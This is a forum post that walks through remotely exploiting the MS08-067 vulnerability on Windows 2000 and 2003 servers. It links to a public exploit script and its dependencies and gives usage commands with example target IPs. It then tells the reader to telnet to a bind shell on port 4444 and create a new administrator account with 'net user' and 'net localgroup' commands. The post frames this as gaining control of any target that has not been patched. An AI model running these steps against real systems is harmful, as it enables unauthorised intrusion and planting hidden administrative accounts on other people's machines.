Remotely Exploiting MS08-067 to achieve Administrative rights on 2k and 2k3

3 replies [Last post]
EverestX
EverestX's picture
Offline
SX Crew
Joined: 2009/05/15

Here's the link to Microsoft: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Creds to the author of the script! Chances are you wont find many systems with this not patched these days. While other MS OS's are affected by this vulnerability, this script doesn't apply to them.

The Shell Script: http://milw0rm.org/exploits/7132

You will also need to download and install the following

Impacket : http://oss.coresecurity.com/projects/impacket.html
PyCrypto : http://www.amk.ca/python/code/crypto.html

Once you have identified a target download the shell script and save it out as a exploit.sh file. Chmod the file for execution.

Usage:

./exploit *Target IP* *OS*

For *OS* use 1 for 2000 and 2 for 2003 server

Example

2000 server

./exploit 192.168.0.100 1

2003 server

./exploit 192.168.0.100 2

Photobucket

Once the Exploit is successfull, telnet to port 4444 on your target, this will place you in a windows shell.

Photobucket

Add your administative user!

Photobucket
net user /add *user* *password*

Photobucket

net localgroup administrators *user* /add
Photobucket

You now have root.

EvX

This is a security site. We don't assist with computer repair! Unless you give us your $$ [I'm serious]
https://www.soldierx.com/blogs/EverestX/Get-my-lawn-and-stop-posting-bul...